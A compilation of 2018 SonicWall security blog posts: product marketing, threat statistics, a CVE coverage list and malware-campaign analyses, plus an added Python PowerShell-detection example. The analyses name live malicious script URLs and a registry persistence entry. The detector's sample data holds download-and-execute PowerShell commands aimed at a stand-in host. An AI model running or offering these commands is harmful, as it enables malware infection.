How Everyone Can Implement SSL Decryption & Inspection

Since 2011, when Google announced it was switching to Hypertext Transfer Protocol Secure (HTTPS) by default, there has been a rapid increase in Secure Sockets Layer (SSL) sessions.

Initially, SSL sessions were reserved for only important traffic, where personal, financial or sensitive data was transferred. Now, it seems we can’t receive news or perform a simple search without an encrypted session.

In 2014 and 2015, SSL sessions accounted for about 52 percent of internet traffic. As cloud adoption grew, so did the SSL sessions. By 2017, SSL accounted for 68 percent of all internet traffic. Currently, SonicWall has seen encrypted traffic at almost 70 percent of the total traffic on the internet.

Secure sessions demonstrate that internet users are understanding and embracing session security and privacy. Unfortunately, as SSL sessions have increased, so have encrypted attacks. So far in 2018, SonicWall has seen a 275 percent increase in encrypted attacks compared to 2017. You can find more numbers in the mid-year update of the 2018 SonicWall Cyber Threat Report.

What is DPI-SSL?

The modern cyber threat landscape requires a defense-in-depth posture, which includes SSL decryption capabilities to help organizations proactively use deep packet inspection of SSL (DPI-SSL) to block encrypted attacks.

However, even firewall vendors that claim to offer SSL decryption and inspection may not have the processing power to handle the volume of SSL traffic moving across a network today.

DPI-SSL extends SonicWall’s Deep Packet Inspection technology to inspect encrypted HTTPS and SSL/TLS traffic. The traffic is decrypted transparently, scanned for threats, re-encrypted and sent along to its destination if no threats or vulnerabilities are found.

Available on all SonicWall next-generation firewalls (Generation 6 or newer), DPI-SSL technology provides additional security, application control, and data leakage prevention for analyzing encrypted HTTPS and other SSL-based traffic.

It is important to have a secure and simple setup that minimizes configuration overhead and complexity. There are two primary paths for implementing DPI-SSL.

Option 1: Remote Implementation

Enabling DPI-SSL can sometimes be complex. Diverse sites and programs use certificates differently, some of which may be affected by DPI-SSL capabilities.

To confirm you have DPI-SSL implemented properly, leverage the SonicWall DPI-SSL Remote Implementation Service to ensure seamless and effective implementation of SonicWall DPI-SSL services.

The Remote Implementation Service for SonicWall DPI-SSL deploys and integrates the product into your environment within 10 business days. This service is delivered by Advanced Services Partners who have completed training and demonstrated expertise in DPI-SSL implementation and configuration.

Option 2: Leverage Easy-to-Use Guidance

For those considering in-house implementation, SonicWall also provides a number of knowledge base (KB) articles and resources that walk you through the DPI-SSL implementation process. Some of the most popular include:

These KBs, and others found within SonicWall’s support section or through the DPI-SSL Remote Implementation Service, ensure every type of user or organization has the resources to properly activate DPI-SSL within their infrastructure to mitigate encrypted cyberattacks.

For additional guidance, watch “Initial DPI-SSL Configuration,” a popular SonicWall Firewall Series Tutorial.

DPI-SSL Adoption

Thankfully, SonicWall is witnessing gradual adoption of DPI-SSL add-on services. To best protect your environment, pair DPI-SSL capabilities with the Capture Advanced Threat Protection (ATP) cloud sandbox, Gateway Antivirus, Content Filtering and Intrusion Protection Services (IPS). All are available in the SonicWall Advanced Gateway Security Suite, which delivers everything you need to protect your network from advanced cyberattacks.

Combine these services with a trusted and secure end-point protection software, such as SonicWall Capture Client, and you can provide a robust security posture that can protect devices — even when they are not behind your firewall.

August 2018 Cyber Threat Data: Monthly Attacks Slow, Yearly Volume Up Across the Board

As we inch toward the final stretch of the 2018 calendar, we’re gaining a better sense of the complete cyber threat landscape for the year.

SonicWall Capture Labs threat researchers continue to monitor year-to-date increases for global malware, ransomware, TLS/SSL encrypted attacks and intrusion attempts. In fact, year-to-date attacks are up at least 50 percent in every category compared to 2017.

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through August 2018:

  • 7.8 billion malware attacks (70 percent increase from 2017)
  • 2.6 trillion intrusion attempts (54 percent increase)
  • 238.9 million ransomware attacks (108 percent increase)
  • 1.8 million encrypted threats (73 percent increase)

In August 2018 alone, the average SonicWall customer faced:

  • 2,075 malware attacks (1 percent decrease from July 2017)
  • 817,512 intrusion attempts (28 percent increase)
  • 55 ransomware attacks (41 percent decrease)
  • 49.6 encrypted threats (45 percent decrease)
  • 12.2 phishing attacks each day (37 percent decrease)

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about, so they can design and test their security posture to ensure their networks, data, applications and customers are properly protected.

Get the Mid-Year Update

Dive into the latest cybersecurity trends and threat intelligence from SonicWall Capture Labs. The mid-year update to the 2018 SonicWall Cyber Threat Report explores how quickly the cyber threat landscape has evolved in just a few months.

Importance of Resiliency in Network Security

In life we hear stories about people who are able to recover from difficult situations. They’re often referred to as being “resilient.” Resiliency can also be applied to network security, albeit in a slightly different context. In both cases it’s a good thing to be.

As noted in our mid-year 2018 SonicWall Cyber Threat Report, network threats, such as malware and ransomware attacks, are on the rise compared to 2017. Cybercriminals are persistent in their efforts to find new methods to launch their attacks.

But it’s not just the quantity of attacks that is on the rise. New threats are increasing as well. Some of these are variants spawned from earlier malware or ransomware code, such as WannaCry and Locky. Others are malware cocktails that combine pieces of code from several different variants.

Absorb, Reorganize and Refocus

One of the best and often under-valued ways to protect against these threats is to have a network security solution that is extremely resilient. This doesn’t mean that your firewall is good at picking itself back up off the ground after it’s been defeated by an attack.

According to NSS Labs, a third-party source known for its independent, fact-based cybersecurity guidance, “The resiliency of a system can be defined as its ability to absorb an attack and reorganize around a threat. A resilient device will be able to detect and prevent against different variations of the exploit.”

A key component of this definition is the device’s ability to identify attacks that use evasion techniques to avoid being detected and stopped. Another is protection over time. Some attacks are launched and then quickly disappear. Others, however, are reintroduced over the years, whether in their original form or as a variant.

A resilient firewall will continue to block a threat that was launched previously in addition to current and future variants. Failure to be resilient increases the chance your network is open to an attack. The odds may be small, but it’s still possible. Remember, not every hacker is writing the latest code. Some are new to the game and stick to older, established attacks.

Blocking Never-before-seen Variants

NSS Labs released the 2018 Next-Generation Firewall Group Test results with 10 network security vendors participating in the testing. SonicWall submitted the NSa 2650 next-generation firewall (NGFW), which performed very well in both security effectiveness and value (TCO per protected Mbps), earning the “Recommended” rating for a fifth time.

One particular area in the security effectiveness testing where the NSa 2650 shined was its resiliency to a range of never-before-seen exploit variants. The NSa 2650 achieved a block rate of over 90 percent, outperforming every other firewall except one. In many cases, the difference was significant, with over half of the firewalls scoring only in the 65-75 percent range.

Figure: Exploit Block Rate by Year – Recommended Policies (2018 NSS Labs Next-Generation Firewall Comparative Report: Security)

So, is having a firewall with high resiliency really that important? Research from both SonicWall and NSS Labs indicates that there are quite a few aging attacks still out there in circulation. They may not be as sophisticated as today’s threats, but they remain active. You need to be protected against them.

What’s more, some threat actors launch multi-pronged attacks comprised of the core malware plus a series of variants. The idea is that your firewall may stop one, but not all.

To counter attacks, some security vendors create signatures that are specific to a particular exploit. These signatures typically don’t account for variants, however. And, over time, the signatures may be removed, leaving the firewall open to attack. Ideally, security vendors will create signatures that focus on the vulnerability and block the threat plus its variants — now and in the future.
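To make the distinction concrete, here is an added example in Python (not from the SonicWall article or from NSS Labs): a toy length-prefixed message format with a hypothetical 64-byte server buffer, an exploit-specific signature that matches the filler bytes of one known proof of concept, and a vulnerability-focused signature that flags any payload exceeding the buffer. The protocol, buffer size and all samples are constructed for the illustration.

```python
"""
Exploit-specific signature vs. vulnerability-focused signature.

Toy protocol (constructed for this example, not a real service):
a request is  b"CMD " + <4-digit ASCII decimal length> + b" " + <payload>.
A hypothetical server copies <payload> into a 64-byte buffer, so any
payload longer than 64 bytes would trigger the (toy) overflow.
"""
import re

BUFFER_SIZE = 64  # assumed size of the vulnerable server buffer (constructed)

# Signature A: matches the exact filler bytes of the first public proof of
# concept. It encodes what one exploit looked like, not what the bug is.
EXPLOIT_SPECIFIC = re.compile(rb"CMD \d{4} A{72}")


def match_exploit_signature(request: bytes) -> bool:
    return EXPLOIT_SPECIFIC.search(request) is not None


def parse_request(request: bytes):
    """Return (declared_length, payload), or None if the framing is invalid."""
    m = re.match(rb"CMD (\d{4}) (.*)\Z", request, re.DOTALL)
    if m is None:
        return None
    return int(m.group(1)), m.group(2)


def match_vulnerability_signature(request: bytes) -> bool:
    """Signature B: flag any request whose payload would overrun the buffer,
    whatever filler bytes the attacker chose and even if the length field lies."""
    parsed = parse_request(request)
    if parsed is None:
        return False
    declared_len, payload = parsed
    return declared_len > BUFFER_SIZE or len(payload) > BUFFER_SIZE


def build_request(payload: bytes) -> bytes:
    return b"CMD %04d %s" % (len(payload), payload)


# Constructed samples: benign traffic, the original PoC and two variants.
SAMPLES = {
    "benign":      build_request(b"GET /index.html"),
    "original":    build_request(b"A" * 72),
    "variant_pad": build_request(b"\x90" * 72),           # different filler bytes
    "variant_len": build_request(b"A" * 65 + b"B" * 40),  # different length and mix
}


def evaluate() -> dict:
    """Run both signatures over every sample.
    Returns {sample_name: (exploit_specific_hit, vulnerability_focused_hit)}."""
    return {name: (match_exploit_signature(req), match_vulnerability_signature(req))
            for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (hit_a, hit_b) in evaluate().items():
        print(f"{name:12s} exploit-specific={hit_a!s:5s} vulnerability-focused={hit_b}")
```

The exploit-specific rule catches only the sample it was written from; the vulnerability-focused rule catches the original and both variants while leaving the benign request alone.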

If you’re not sure whether your firewall is resilient, or how it rates in security effectiveness and value, SonicWall can help. Visit SonicWall.com to download and read NSS Labs test reports, including the Security Value Map™.

Active spam campaign spreading Feodo banking trojan spotted

The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.

Infection cycle:

The spam email purports to be from a bank, vendor or business supplier, typically with a PDF or DOC attachment as shown below.

The PDF file, for instance, contains a link to download your invoice or statement.


Clicking on the link will then download a document file which has embedded Visual Basic macros.

These macros launch complex procedures when the document is opened. By default, the Trust Center’s macro security setting disables macros, and a security warning appears when a macro is detected within a document file. To circumvent this, the body of the document instructs the victim to enable editing and enable content in order to view the document.

Once the Visual Basic script executes, it spawns cmd.exe, which in turn launches PowerShell to download the banking Trojan.

Below is an example of what commands were executed by cmd and powershell to perform this malicious task:

It then executes the downloaded Feodo Trojan. The Trojan copies itself as “pagesrouted.exe” and registers itself in the registry to ensure persistence.

  • HKLM/Software/Microsoft/Windows/CurrentVersion/Run  pagesrouted   “%APPDATA%/Local/Wndows/pagesrouted.exe”

During our analysis, the Trojan just runs quietly in the background. Once we opened a browser instance and logged onto an online banking website, it then contacted a known Feodo C&C server and sent encrypted data.

During the past week, we have observed this threat spread throughout the United States, Germany, India and Brazil.


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Feodo.S (Trojan)
  • GAV: Feodo.S _2 (Trojan)


Botnets Targeting Obsolete Software

Overview: This is not a disclosure of a new vulnerability in SonicWall software. Customers with the current SonicWall Global Management System (GMS) 8.2 and above have nothing to worry about. The reported vulnerability relates to an old version of GMS (8.1), which was replaced in December 2016. Customers with GMS 8.1 and earlier releases should patch, per SonicWall guidance, as they are running out-of-support software. Best practice is to deploy a SonicWall next-generation firewall (NGFW) or a web application firewall (WAF) in front of GMS and other web servers to protect against such attacks. Look for global third-party validation on protection effectiveness, such as the 2018 NSS Labs NGFW Group Test. After rigorous testing, SonicWall firewalls earned the NSS Labs coveted ‘Recommended’ rating five times.

On Sept. 9, Palo Alto Networks Unit 42 published a blog post highlighting a developing trend of botnets picking up publicly known CVE exploits and weaponizing them against enterprise infrastructure. This marks a change in the botnet authors’ tactics from targeting consumer-grade routers and IP cameras to searching for higher-profile enterprise targets to harness additional endpoints for DDoS attacks.

The first botnet, Mirai, targeted the Apache Struts vulnerability from early 2017, which affects web servers around the world. On March 6, 2017, SonicWall provided protection against the Apache Struts vulnerability with the Intrusion Prevention Service (IPS) on the NGFW line, rolling out protection to all firewalls with licensed IPS service.

The second botnet highlighted in the Palo Alto Networks post, Gafgyt, picked up the Metasploit code for an XML-RPC vulnerability for an obsolete version of SonicWall GMS (8.1) central management software, which was replaced by GMS 8.2 in December 2016.

The bottom line: the reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Implementing Cybersecurity Best Practices

Current SonicWall GMS users are not at risk. However, there are broader lessons here for the industry and business owners:

  • Take End-of-Life and End-of-Support announcements seriously and update proactively. Unsupported components become a security risk for critical systems and compromise an enterprise’s compliance and governance posture.
  • Security best practices dictate that you never expose a web server directly to the internet without a NGFW or WAF deployed in front.
  • A security layer between the internet and critical enterprise infrastructure, like web servers or centralized firewall management, provides the ability to virtually patch zero-day vulnerabilities and exploits while working out a sensible patching strategy. For example, a SonicWall NGFW with Intrusion Prevention or a SonicWall WAF can easily handle this task.

Using Third-Party Validation

The blog post does, however, underscore the rapidly-evolving nature of today’s threat landscape, evidenced by the mixing of malware and exploits to create new malware cocktails, and the need to use the latest and most effective security solutions to protect against them.

When selecting a product to protect your critical infrastructure, go beyond listening to vendor claims and look at globally recognized independent testing, such as the NSS Labs NGFW report, to validate security efficacy. Items that you should consider when selecting a security product for the modern threat landscape:

  1. NSS Labs specifically tests for protection on non-standard ports (not just 80/443, for example) because malware often uses non-standard ports to bypass traffic inspection. Products that lack inspection on non-standard ports are blind to many malware attacks, and are easily fooled into missing dangerous traffic and allowing malware and exploits to sail right through.

Figure: 2018 NSS Labs NGFW Group Test Report — Evasion Resistance

Figure: 2018 NSS Labs Next Generation Firewall Security Value Map™ (SVM)

  2. Evaluate your NGFW on security efficacy, and how it deals with malware cocktails, such as the recently exposed Intel-based, processor-level vulnerabilities like Spectre, Meltdown and Foreshadow.
  • SonicWall patented and patent-pending Real-Time Deep Memory Inspection (RTDMI™) technology is proven to catch chip/processor attacks through its unique approach to real-time memory inspection.
  • SonicWall RTDMI protection can also be applied to mitigate malicious PDFs, Microsoft Office documents and executables. The focus on PDF and Office document protection is especially important. Attacks are shifting into this delivery mechanism as browsers clamped down on Flash and Java content, drying up a fertile area of exploit and malware delivery. For example, RTDMI discovered more than 12,300 never-before-seen attack variants in the first half of 2018 alone.
  • The SonicWall Capture Client endpoint suite plugs into the RTDMI engine to offer the same protection for users that are outside a protected network.


The Bottom Line

The reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Microsoft Security Bulletin Coverage for September 2018

The SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of September 2018. A list of the issues reported, along with SonicWall coverage information, is as follows:

CVE-2018-0965 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8269 OData Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8271 Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8315 Microsoft Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8331 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8332 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8335 Windows SMB Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8336 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8337 Windows Subsystem for Linux Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8354 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8366 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8367 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13598 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 3
CVE-2018-8391 Scripting Engine Memory Corruption Vulnerability
IPS 13599 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 4
CVE-2018-8392 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8393 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8409 ASP.NET Core Denial of Service
There are no known exploits in the wild.
CVE-2018-8410 Windows Registry Elevation of Privilege Vulnerability
ASPY 5251 : Malformed-File exe.MP.36
CVE-2018-8419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8420 MS XML Remote Code Execution Vulnerability
IPS 13600 : MS XML Remote Code Execution Vulnerability (SEP 18)
CVE-2018-8421 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8424 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8425 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2018-8426 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2018-8428 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8429 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8430 Word PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8431 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8433 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8434 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8435 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8436 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8437 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8438 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8439 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8440 Windows ALPC Elevation of Privilege Vulnerability
GAV 2809 : Injector.PC
CVE-2018-8441 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8442 Windows Kernel Information Disclosure Vulnerability
SPY 5252 : Malformed-File exe.MP.37
CVE-2018-8443 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8444 Windows SMB Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8445 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8446
There are no known exploits in the wild.
CVE-2018-8447 Internet Explorer Memory Corruption Vulnerability
IPS 13601 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8449 Device Guard Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8452 Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8455 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8456 Scripting Engine Memory Corruption Vulnerability
IPS 13602 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 5
CVE-2018-8457 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8459 Scripting Engine Memory Corruption Vulnerability
IPS 13603 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 6
CVE-2018-8461 Internet Explorer Memory Corruption Vulnerability
IPS 13604 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8462 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8463 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8464 Microsoft Edge PDF Remote Code Execution Vulnerability
ASPY 5244 : Malformed-File pdf.MP.320
CVE-2018-8465 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8466 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13594 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8467 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13595 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8468 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8469 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8470 Internet Explorer Security Feature Bypass Vulnerability
IPS 13597 : Internet Explorer Security Feature Bypass Vulnerability (SEP 18)
CVE-2018-8474 Lync for Mac 2011 Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8475 Windows Remote Code Execution Vulnerability
ASPY 5253 : Malformed-File tif.MP.23
CVE-2018-8479 Azure IoT SDK Spoofing Vulnerability
There are no known exploits in the wild.

New Phishing Campaign Leverages Fileless PowerShell execution using LNK

SonicWall has recently spotted a new phishing email campaign spreading actively in the last few days. The malicious email, disguised as a legitimate invoice payment or FedEx receipt, delivers a RAR attachment to the targeted users. Upon extraction of the RAR file, the user sees a LNK file that looks like a legitimate document. The LNK file then remotely executes a fileless PowerShell script to download an initial payload. This initial payload then brings down multiple payloads, runs shellcode and connects to a command and control (C&C) server, which gives the remote attacker access to the compromised computer.


Figure 1: Multi stage attack leveraging LNK files


Phishing Email Campaign: 

Phishing email is the most popular tactic for tricking users into clicking malicious content. It is also determined to be the initial infection vector for most compromises. Attackers trick email recipients into clicking on an attachment or URL in order to infect their computer or steal information. In this phishing campaign, a FedEx receipt or invoice payment receipt has been sent out to targeted victims.

Figure 2: Phishing email used in this campaign

Emails are sent with RAR attachment which when extracted delivers two LNK files.

Figure 3: Link files extracted from RAR attachment


LNK file:

LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file or an application. LNK files are generally used to create start menu and desktop shortcuts. LNK stands for LiNK.

In this case, the LNK files are disguised as a legitimate document by changing the icon using the image resource DLL (%SystemRoot%\System32\imageres.dll), as shown below.

Figure 4: LNK file icon has been modified to look like a legit document


Fileless PowerShell Attack:

In this version, LNK file executes PowerShell.exe.

Figure 6: Fileless PowerShell script execution with IEX


A fileless malware attack loads malware into memory without writing it to disk. Since no file ever reaches the disk, file-based detection misses it. In the PowerShell command shown above, the DownloadString method downloads the content from a remote location (‘http://dataishwar.in/ju/jjl.ps1’) into an in-memory buffer, $wcli. Here, even rules that block execution of certain extensions such as .ps1 wouldn’t work, as Invoke-Expression (IEX) is used.

The Invoke-Expression (IEX) cmdlet in PowerShell evaluates or runs a specified string as a command and returns the results of the expression.

Malicious PowerShell Script is copied from the remote location and gets executed from memory. It then downloads more malicious payloads to compromise the user machine.
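The detection side of the chain described above, and of the cmd.exe -> powershell download stage in the Feodo write-up earlier on this page, as an added Python example that is not part of either SonicWall post: a scorer over process-creation command lines that flags the DownloadString/IEX fetch-and-run pattern, including when it is hidden behind -EncodedCommand. The domain example.invalid, the scoring thresholds and every command line below are constructed for the example.

```python
"""
Detection logic for the in-memory download-and-execute chain
(cmd.exe -> powershell.exe -> DownloadString -> IEX). Input is the command
line a process-creation log (e.g. Sysmon Event ID 1) would record; the
samples here are constructed and point at a non-routable domain.
"""
import base64
import re
from dataclasses import dataclass, field

# Each indicator is one facet of the technique; hits are counted and named.
INDICATORS = {
    "download":   re.compile(r"\b(DownloadString|DownloadFile|DownloadData|"
                             r"Net\.WebClient|Invoke-WebRequest)\b", re.I),
    "invoke":     re.compile(r"""(^|[\s;(|"'])(iex|Invoke-Expression)\b""", re.I),
    "hidden":     re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "bypass":     re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I),
    "noprofile":  re.compile(r"-nop(rofile)?\b", re.I),
    "url":        re.compile(r"https?://", re.I),
    "cmd_parent": re.compile(r"\bcmd(\.exe)?\b.*\bpowershell", re.I),
}
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded_command(cmdline: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; append the decoded text
    so the indicators above also see what would actually run."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2), validate=True).decode("utf-16-le", "replace")
    except ValueError:
        return cmdline
    return cmdline + " " + decoded


@dataclass
class Verdict:
    cmdline: str
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Fetch plus in-memory execution is the core of the technique; a pile of
        # evasion switches around a download is flagged even without IEX.
        fetch_and_run = "download" in self.hits and "invoke" in self.hits
        return fetch_and_run or len(self.hits) >= 4


def score_command_line(cmdline: str) -> Verdict:
    text = expand_encoded_command(cmdline)
    return Verdict(cmdline, [name for name, rx in INDICATORS.items() if rx.search(text)])


def triage(command_lines):
    """Return one Verdict per command line, in input order."""
    return [score_command_line(c) for c in command_lines]


# Constructed samples (not the campaign's real command lines).
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s1.ps1')"
_ENCODED = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()

SAMPLE_COMMAND_LINES = [
    # Macro-spawned chain as in the Feodo write-up: cmd.exe -> powershell -> download
    "cmd.exe /c powershell -nop -w hidden -ep bypass \"(New-Object Net.WebClient)"
    ".DownloadFile('http://example.invalid/p.exe','%APPDATA%\\p.exe')\"",
    # LNK-launched fileless stage: script fetched and run from memory with IEX
    f'powershell.exe -w hidden -c "{_STAGE1}"',
    # The same stage hidden behind -EncodedCommand
    f"powershell.exe -nop -EncodedCommand {_ENCODED}",
    # Benign admin usage: -NoProfile and Bypass alone are not enough to flag
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending"',
]

if __name__ == "__main__":
    for v in triage(SAMPLE_COMMAND_LINES):
        label = "SUSPICIOUS" if v.suspicious else "ok        "
        print(f"{label} {v.hits} {v.cmdline[:60]}")
```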


Threat Graph:

It appears the attacker compromised a legitimate site (‘http://dataishwar.in’) and hosted malicious PowerShell scripts and payloads on it. Based on the first-seen dates of the samples, the campaign has likely been active since July.

Figure 7: Threat intelligence graph from VirusTotal

Hash:

  • 77952875afc68bc3f5aebd99019ea9afda995a17dfb75b6d8de1bd24a70790ff

Listed below are other malicious PowerShell scripts hosted in the same website:

  • http://dataishwar.in/mlioc/ortsd.ps
    First Seen: 2018-09-04 09:08:43
  • http://dataishwar.in/yiu/orrd.ps1
    First Seen: 2018-09-02 08:04:18
  • http://dataishwar.in/mlioc/ortsd.ps1
    First Seen: 2018-09-03 08:46:29
  • http://dataishwar.in/cxs/oise.ps1
    First Seen: 2018-09-02 10:39:05

Trend Graph:

SonicWall has observed a spike in detection in the last few days. 

Figure 7: Hits graph


SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • GAV 7968: Downloader.FBQH
  • IPS 13513: LNK Remote Code Execution (JUN 17) 1
  • IPS 13514: LNK Remote Code Execution (JUN 17) 2

Cyber Security News & Trends

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Cybersecurity and the future of work: How much can we predict? – Silicon Republic (Ireland)

  • SonicWall CEO Bill Conner, talking to Silicon Republic, shares his thoughts on battling the growth areas of cybercrime over the coming years.

US Indicts North Korean Over Sony, Bank and WannaCry Attacks – Infosecurity magazine

  • The U.S. Justice Department has formally charged a hacker in connection with cybercrimes that they are directly connecting to the North Korean government. SonicWall’s Bill Conner is featured as a security expert on the issue.

Cyber Security News

British Airways boss apologises for ‘malicious’ data breach – BBC

  • A week after the Air Canada security leak, another major security breach at an airline, this time British Airways, has been dominating news headlines. Names, email addresses and credit card information from over 380,000 transactions have been compromised.

Nope, the NSA isn’t sitting in front of a supercomputer hooked up to a terrorist’s hard drive – The Register

  • The Register talks about what exactly Government intelligence services want versus what it’s likely they will be able to get in the current digital climate.

The Case for a National Cybersecurity Agency – Politico

  • Gen. David Petraeus argues in Politico that national cybersecurity is in need of a complete overhaul with the creation of an independent National Cybersecurity Agency that reports directly to the President.

FIN6 returns to attack retailer point of sale systems in US, Europe – ZDNet

  • Point of Sale (POS) malware is really gathering steam. ZDNet has a report on a new campaign by a cybercriminal group called FIN6, previously known for selling credit card numbers on the Dark Web.

More U.S. Cities Brace for ‘Inevitable’ Hackers – The Wall Street Journal

  • After the city of Atlanta paid millions of dollars to ransomware attackers this year, other U.S. cities are considering their options on how to handle cyberattacks.

Obama-Themed Ransomware Also Mines for Monero – BankInfoSecurity

  • They’re calling it Barack Obama’s Everlasting Blue Blackmail Virus and it doubles as a cryptocurrency miner on top of being ransomware.

In Case You Missed It

Infographic: Ransomware’s Devastating Impact on Real-World Businesses

Still relatively new to the cyber threat landscape, ransomware continues to be one of the high-profile malware types that grab headlines. It’s one part Hollywood-style drama mixed with the “mystery” of cryptocurrencies and the seemingly personal nature of ransomware attacks.

But it’s not hyperbole. Ransomware remains one of the most malicious cyberattacks that can cripple a business. SonicWall’s new infographic highlights composite data that demonstrates how ransomware impacts businesses’ ability to operate.

So, how do you prevent your organization from being severely disrupted by ransomware? The best approach is to use multiple layers that deliver automated, real-time breach detection and prevention. While this isn’t an exhaustive list of all security options, these cornerstone tactics will mitigate most of today’s most malicious cyberattacks, including ransomware.

How to Block Ransomware

Businesses have no choice but to proactively mitigate ransomware attacks. But is there a proven approach that can cost-effectively scale across networks and endpoints? Four key security capabilities make full ransomware protection possible.

  1. Next-Generation Firewall

    Detect and prevent cyberattacks with power, speed and precision.
    Next-generation firewalls (NGFW) are one of your first lines of defense against hackers, cybercriminals and threat actors.

    For example, SonicWall firewalls deliver real-time, cloud-based threat prevention, while augmenting the security from on-box deep packet inspection of SSL traffic (DPI-SSL). And all new SonicWall firewalls integrate with our award-winning network sandbox for advanced threat protection.

  2. Network Sandbox

    Identify and stop unknown attacks in real time.
    A network sandbox is an isolated environment on the firewall that runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be achieved.

